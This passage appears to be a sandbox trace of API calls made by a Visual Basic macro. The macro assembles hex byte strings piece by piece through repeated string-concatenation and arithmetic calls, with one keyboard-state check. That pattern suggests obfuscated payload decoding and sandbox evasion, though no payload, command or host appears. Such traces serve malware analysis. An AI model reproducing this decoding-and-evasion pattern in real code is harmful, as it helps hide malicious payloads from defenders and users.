VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.908] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.908] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.908] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.909] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.909] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.917] GetAsyncKeyState (vKey=3) returned 0 [0114.917] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.918] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.918] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.918] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.918] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.918] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.918] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.918] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.918] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.918] VarBstrCat (in: bstrLeft="&H8", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.918] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.919] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.919] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.919] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.919] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.919] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.919] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.919] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.919] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.919] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.919] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.920] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.920] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.920] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.920] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.920] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.920] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.920] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.920] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.920] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.920] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.921] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.921] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.921] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.921] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.921] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.921] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.921] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.921] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.921] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.921] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.922] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.922] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.922] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.922] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.922] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.922] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.922] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.922] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.922] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.922] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.923] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.923] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.923] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.923] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.923] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.923] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.923] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.923] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.923] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.923] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.924] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.924] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.924] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.924] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.924] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.924] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.924] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.924] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.924] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.924] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.925] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.925] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.925] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.925] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.925] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.926] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.926] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.926] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.926] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.926] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.926] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.927] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.927] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.927] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.927] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.927] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.927] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.928] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.928] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.928] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.928] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.928] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.928] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.929] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.929] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.929] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.929] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.929] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.929] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.929] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.930] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.930] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.930] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.930] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.930] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.930] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.930] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.930] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.931] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.931] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.931] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.931] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.931] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.931] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.931] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.931] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.932] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.932] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.932] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.932] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.932] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.933] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.933] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.933] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.933] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.933] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.933] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.934] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.934] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.934] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.934] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.934] VarBstrCat (in: bstrLeft="&Ha", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.934] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.935] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.935] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.935] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.935] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | 